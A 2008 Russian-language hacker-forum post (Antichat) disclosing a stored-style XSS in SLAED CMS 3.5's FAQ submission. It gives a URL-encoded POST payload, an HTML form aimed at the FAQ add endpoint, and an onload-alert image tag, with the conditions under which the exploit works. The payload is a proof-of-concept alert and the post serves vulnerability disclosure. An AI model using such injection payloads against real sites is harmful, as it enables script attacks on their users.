[ Обзор уязвимостей SLAED CMS ]

11.05.2008, 00:38

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

С нами: 11020706

Репутация: 4693

Пассивная XSS в Slaed CMS v. 3.5:

POST-запрос:

Код:

subject=%3Cimage+src%3Duploads%2Favatars%2F00.gif+onload%3Dalert%28%2Flala%2F%29%3E&hometext=1

Ну или создать:

Код:

<form method="POST" action="http://site/index.php?name=FAQ&op=add">
 subject: <input type="text" name="subject"/><br />
 hometext: <input type="text" name="hometext" value="1"/><br />
 <input type="submit" />
</form>

и в поле subject прописать:

Код:

<image src=uploads/avatars/00.gif onload=alert(/lala/)>

В src должен быть указан путь к реально существующей картинке, параметр hometext должен быть установлен, значение может быть любым. Работает, если у пользователя есть права на добавление, даже при включеной предмодерации.

Моё, кажется нигде не было.

З.Ы.
Предложение модераторам: Может топик переименовать в просто Slaed CMS, без номера версии?

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

Последний раз редактировалось Qwazar; 11.05.2008 в 00:42..